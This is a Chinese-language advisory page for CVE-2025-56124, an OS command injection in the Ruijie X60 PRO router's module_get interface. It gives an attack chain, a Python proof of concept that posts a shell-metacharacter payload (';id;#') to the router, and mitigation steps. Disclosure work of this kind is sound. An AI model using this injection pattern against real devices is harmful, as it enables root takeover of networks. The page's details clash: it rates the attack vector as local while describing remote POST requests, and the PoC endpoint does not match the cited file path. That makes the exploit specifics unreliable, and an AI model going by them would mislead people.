CVE-2025-56124 锐捷X60 PRO路由器OS命令注入漏洞

漏洞信息

漏洞编号

CVE-2025-56124

漏洞类型

OS命令注入

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Ruijie X60 PRO (X60_10212014RG-X60 PRO V1.00/V2.00)

漏洞概述

CVE-2025-56124是锐捷网络X60 PRO路由器中存在的一个严重的操作系统命令注入漏洞。该漏洞存在于设备的Web管理界面功能中，攻击者可以通过向设备发送精心构造的POST请求，在目标系统上执行任意操作系统命令。漏洞位于/usr/local/lua/dev_sta/networkConnect.lua文件中的module_get接口。由于该路由器通常部署在企业网络和公共场所，漏洞的存在可能导致大规模的网络安全事件。攻击者成功利用此漏洞后，可以完全控制受影响的路由器设备，获取敏感网络信息、监听或篡改网络流量，甚至将受感染设备作为进一步攻击内网其他系统的跳板。该漏洞的CVSS评分为7.8，属于高危级别，攻击复杂度低且无需用户交互，具有较高的实际威胁性。

技术细节

该漏洞是由于应用程序在处理用户输入时未对特殊字符进行有效过滤，直接将用户可控的参数拼接到系统命令中执行所致。具体来说，漏洞位于Ruijie X60 PRO路由器的Lua脚本文件/usr/local/lua/dev_sta/networkConnect.lua中的module_get接口。攻击者可以通过POST请求向该接口发送包含恶意命令的载荷，利用分号、反引号或管道等Shell元字符注入额外命令。由于设备以较高权限运行Web服务，注入的命令将以root权限执行，从而实现完全的系统控制。攻击者通常需要具备设备的网络访问权限或利用其他认证缺陷来触发该漏洞。成功利用后，攻击者可以执行任意系统命令、安装后门、修改路由表或提取设备配置文件中的敏感信息。

攻击链分析

STEP 1

步骤1

攻击者获取锐捷X60 PRO路由器的网络访问权限，可通过局域网或社会工程学手段获取

STEP 2

步骤2

攻击者识别目标设备型号和版本信息，确认其为X60_10212014RG-X60 PRO V1.00或V2.00

STEP 3

步骤3

攻击者构造恶意POST请求，访问/usr/local/lua/dev_sta/networkConnect.lua中的module_get接口

STEP 4

步骤4

在请求参数中注入OS命令，利用分号、反引号等Shell元字符绕过输入验证

STEP 5

步骤5

恶意命令以root权限在路由器上执行，攻击者获得完全控制权

STEP 6

步骤6

攻击者可安装后门、窃取数据、监听流量或作为跳板攻击内网其他系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-56124 PoC - Ruijie X60 PRO OS Command Injection
# Target: Ruijie X60 PRO Router
# Vulnerability: OS Command Injection in /usr/local/lua/dev_sta/networkConnect.lua

target_ip = "192.168.1.1"  # Replace with target router IP
target_port = 80

url = f"http://{target_ip}:{target_port}/cgi-bin/luci/api/module_get"

# Payload to inject OS command (id command for verification)
payload = {
    "module": "networkConnect",
    "action": "connect",
    "param": ";id;#"
}

headers = {
    "Content-Type": "application/x-www-form-urlencoded",
    "User-Agent": "Mozilla/5.0"
}

try:
    response = requests.post(url, data=payload, headers=headers, timeout=10)
    print(f"Status Code: {response.status_code}")
    print(f"Response: {response.text}")
except requests.exceptions.RequestException as e:
    print(f"Request failed: {e}")

影响范围

Ruijie X60 PRO V1.00

Ruijie X60 PRO V2.00

X60_10212014RG-X60 PRO V1.00

X60_10212014RG-X60 PRO V2.00

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1) 限制对路由器管理接口的网络访问，仅允许受信任的IP地址访问；2) 使用ACL访问控制列表过滤进出路由器的可疑流量；3) 监控设备日志，关注异常的POST请求模式；4) 考虑使用VPN隧道进行安全的远程管理；5) 如果业务允许，可暂时禁用受影响的网络连接功能模块以降低风险。